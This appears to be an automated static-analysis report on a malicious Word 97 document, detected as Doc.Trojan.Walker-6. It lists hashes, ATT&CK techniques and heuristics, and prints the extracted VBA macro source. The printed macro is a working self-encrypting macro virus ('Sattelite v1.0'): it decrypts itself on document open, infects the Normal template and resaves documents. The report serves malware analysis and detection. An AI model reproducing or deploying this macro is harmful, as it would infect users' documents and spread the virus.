Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 210a03c24d628e63…

MALICIOUS

Office (OLE)

33.5 KB Created: 1998-11-15 16:19:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: d5293882eaec17a551032dd7c22fd69c SHA-1: 2fa906f9caf314a8326c8360764f641c3d619089 SHA-256: 210a03c24d628e6347e2d4c55a4ca102b473a37c75b3316be2ad8a510d76cbbd
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros, specifically a Document_Open macro designed to execute upon opening. The macro decrypts obfuscated code, which is then executed. This behavior is consistent with a downloader or dropper malware. The ClamAV detection of 'Doc.Trojan.Walker-6' further supports its malicious nature. The macro's comments indicate it is 'Sattelite v1.0'.

Heuristics 3

  • ClamAV: Doc.Trojan.Walker-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Walker-6
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename  Kind  Source  Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11909 bytes
SHA-256: 269a902b2e2438eadb9180927d8041f212ef0ed9cea1fe43acb552f48e29fc94
Detection
ClamAV: Doc.Trojan.Walker-6
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True









































'Sattelite v1.0
'NormalTemplate
Private Function encr(s, k As Integer)
Dim r: r = "": For f = 1 To Len(s): r = r + Chr((Asc(Mid$(s, f, 1))) Xor k): Next: encr = r
End Function
Private Sub Document_Open()
On Error Resume Next: W = 0: CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH)
WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1)
If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule
With Iam: .ReplaceLine 101, Kar: Z = .CountOfLines - 27: For X = 63 To Z:
If W = 20 Then W = 0
decrypt = .Lines(X, 1): W = W + 2: Y = Len(decrypt): Y = Y - 1: decrypt = Right$(decrypt, Y): .ReplaceLine X + 20, encr(decrypt, (W)): Next X: End With
Call ThisDoc: Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule: Flag = 0: GoTo Over
Again: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule: Flag = 1
Over:
With Iam: For X = 83 To 100: .ReplaceLine X, "'": Next X: End With
If Flag = 0 Then GoTo Again
End Sub
Private Sub ThisDoc()
'
'
'Ml"Gppmp"Pgqwog"Lgzv
'Etthmgepmkj*AjefhaGejgahOa}$9$s`Gejgah@mwefha`
'Ivroihu(PotsuVtirceroih&;&@gjuc
'Gx|agf{&[i~mFgzeidXzgex|(5(Nid{m
'Yo~*Ki~Ikxxcox*7*Ki~c|oNei god~$\HZxe`oi~$\HIegzedod~y";#$IenoGen fo
'_ix,Bc~aOm~~ei~,1,Bc~am`Xia|`mxi"ZN\~cfiox"ZNOca|cbibx $=%"OchiAchy`i
'@G.3.@a|cobZkc~bozk XL^|adkmz XLMac~a`k`z}&?' MajkCaj{bk Bg`k}&:<".?'
'QY0-0QsdyfuT se}u~d>FR@b zusd>FRS }` ~u~dc8!9>S tu] te|u>\y~uc8$"<0!9
'[t2GQsaw:\[;2/205ASFFW^[FW2D#<"02Fzw|2\}` [|afs~~wv2/2F`gw2W~aw2\}` [|afs~~wv2/2Ts~aw
']r4AWugq<Z]=4(*463GU@@QX]@Q4B%:$64Uzp4Z{fyWuff}qf:W{az`[rX}zqg4*4$4@|qz4Ql}`4Gav
'Kd"WAcqg*CK+"?" %QCVVGNKVG"T3,2 "Vjgl"CavKlqvcnngf"?"Vpwg"Gnqg"CavKlqvcnngf"?"Dcnqg
'Mb$QGewa,EM-$8:$&#WEPPAHMPA$R5*4&$Ej`$EgpGevvmav*GkqjpKbHmjaw$:$4$Plaj$A|mp$Wqf
'O`&HitkOhurgjjcb&;&Rtsc&Ghb&GerOhurgjjcb&;&Rtsc&Rnch&C~or&Usd
'An(FgzeAf{|iddml(5(Nid{m(\`mf2([m|(Afnmk|agf(5(FgzeKizzamz2([m|(Kizzamz(5(Ik|Kizzamz2(Md{m2([m|(Afnmk|agf(5(Ik|Kizzamz2([m|(Kizzamz(5(FgzeKizzamz
']c~b*Ikxxcox0*\cxIeno*7*$Fcdoy";&*$Ie d~ElFcdoy#0*Odn*]c~b
'[exd,Ebjioxecb6,"Hi`ixi@ebi ,= ,"OcybxCj@ebi 6,"Eb i~x@ebi ,= ,Ze~Ochi
'Gh.@a|cG`}zobbkj.3.Hob}k.Zfk`. \k~bomkBg`k.:=".,)@a|cobZkc~bozk,.Kb}k. \k~bomkBg`k.:=".,)Jam{ck`z,
'U~t0Gydx
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'

End Sub
Private Sub Document_Close()
WhereAmI = NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(43, 1): CH = Word.ActiveDocument.Characters.Count: Kar = "'" + Str(CH)
If WhereAmI = "'NormalTemplate" Then Set Iam = NormalTemplate.VBProject.VBComponents(1).CodeModule Else: Set Iam = ActiveDocument.VBProject.VBComponents(1).CodeModule:
Kar2 = Iam.Lines(101, 1): Iam.ReplaceLine 101, "'": NormalTemplate.Save: If Kar = Kar2 Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
End Sub


' Processing file: /opt/analyzer/scan_staging/54c5db613ac94a97a55f29c11a07502d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 7670 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' Line #6:
' Line #7:
' Line #8:
' Line #9:
' Line #10:
' Line #11:
' Line #12:
' Line #13:
' Line #14:
' Line #15:
' Line #16:
' Line #17:
' Line #18:
' Line #19:
' Line #20:
' Line #21:
' Line #22:
' Line #23:
' Line #24:
' Line #25:
' Line #26:
' Line #27:
' Line #28:
' Line #29:
' Line #30:
' Line #31:
' Line #32:
' Line #33:
' Line #34:
' Line #35:
' Line #36:
' Line #37:
' Line #38:
' Line #39:
' Line #40:
' Line #41:
' 	QuoteRem 0x0000 0x000E "Sattelite v1.0"
' Line #42:
' 	QuoteRem 0x0000 0x000E "NormalTemplate"
' Line #
... (truncated)